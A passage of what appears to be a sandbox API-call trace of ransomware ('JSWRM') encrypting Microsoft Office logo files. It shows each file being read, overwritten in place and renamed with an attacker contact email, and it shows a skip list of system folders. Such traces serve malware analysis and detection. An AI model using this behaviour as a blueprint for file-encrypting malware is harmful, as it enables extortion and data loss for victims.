lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbe0, lpOverlapped=0x0) returned 1 [0133.622] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.622] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbe0, lpOverlapped=0x0) returned 1 [0133.622] CloseHandle (hObject=0x238) returned 1 [0133.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.623] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-white_scale-80.png", cAlternateFileName="OU8EEC~1.PNG")) returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.623] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.624] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1739) returned 1 [0133.625] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.625] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x6c0, lpOverlapped=0x0) returned 1 [0133.626] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.626] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x6c0, lpOverlapped=0x0) returned 1 [0133.626] CloseHandle (hObject=0x238) returned 1 [0133.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.627] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.scale-100.png", cAlternateFileName="OU6135~1.PNG")) returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0133.631] lstrcmpiW (lpString1="OutlookLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.632] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2232) returned 1 [0133.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.632] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0133.633] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.633] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0133.634] CloseHandle (hObject=0x238) returned 1 [0133.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.635] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.scale-140.png", cAlternateFileName="OU6CFB~1.PNG")) returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0133.635] lstrcmpiW (lpString1="OutlookLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.636] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2537) returned 1 [0133.636] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.636] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9e0, lpOverlapped=0x0) returned 1 [0133.638] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.638] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9e0, lpOverlapped=0x0) returned 1 [0133.638] CloseHandle (hObject=0x238) returned 1 [0133.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.639] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a74a04e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.scale-180.png", cAlternateFileName="OU2A2D~1.PNG")) returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0133.639] lstrcmpiW (lpString1="OutlookLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.640] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3342) returned 1 [0133.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.640] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd00, lpOverlapped=0x0) returned 1 [0133.642] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.642] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd00, lpOverlapped=0x0) returned 1 [0133.642] CloseHandle (hObject=0x238) returned 1 [0133.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.643] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x744, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.scale-80.png", cAlternateFileName="OU72E3~1.PNG")) returned 1 [0133.643] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.643] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.643] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.643] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.643] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0133.644] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0133.644] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.644] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.644] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0133.644] lstrcmpiW (lpString1="OutlookLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.645] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1860) returned 1 [0133.645] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.645] ReadFile 